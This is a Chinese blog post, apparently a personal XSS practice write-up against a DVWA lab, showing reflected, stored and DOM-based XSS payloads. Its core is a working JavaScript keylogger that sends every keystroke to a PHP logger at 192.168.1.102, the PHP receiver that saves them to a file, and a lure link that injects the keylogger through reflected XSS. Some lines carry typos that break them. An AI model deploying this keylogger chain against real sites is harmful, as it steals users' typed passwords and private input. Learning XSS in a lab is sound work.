大哥带的XSS练习
2024-10-07 04:15:25
0x01反射型
<script>alert("zhong")</script>
可以看见什么都没有过滤
0x02存储型XSS
http://www.xss_demo.com/st-xss.php
那么可以看见也是成功了 那我们试试可不可以顺着网线搞一下组员呐??? 算了 没得服务器 搞搞自己吧
document.onkeypress= function(evt){
evt = evt || window.event
key = String.fromCharCode(evt.charCode);
if(key){
var http = new XMLHttpRequest();
var param =encodeURL(key);
http.open("POST","http://192.168.1.102/Keylogger.php",true);
http.setRequestHeader("Contenet-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
?>
攻击语句
<a href="http://192.168.1.102/dwva/vulnerabilities/xss_r/?name=<scripr+src='http://192.168.1.102/Keylogger.js'></script>">诱人字眼</a>
然后随便敲击 成功写入
0X03dom型
<img src= onerror=alert('xss')>
成功
最新文章
- 升讯威ADO.NET增强组件(源码):送给喜欢原生ADO.NET的你
- SQL Server性能调优系列
- 可视化(番外篇)——SWT总结
- JS中document对象和window对象有什么区别
- ubuntu查看端口占用
- [BZOJ2791][Poi2012]Rendezvous
- USACO section1.2 Miking cows
- C++和java的区别
- 【STM32】STM32 GPIO模式理解
- ossim/zabbix/logstash
- Java I/O流操作(二)---缓冲流[转]
- DDL 和DML 区别
- &;lt;&;lt;Python基础课程&;gt;&;gt;学习笔记 | 文章13章 | 数据库支持
- IOS之frame和bounds区别
- [AOP系列]Autofac+Castle实现AOP事务
- Unity3D中默认函数的执行顺序
- c# double decimal
- SVN快速入门笔记【转】
- 浅谈Log4j2日志框架及使用
- linux下Mysql多实例实现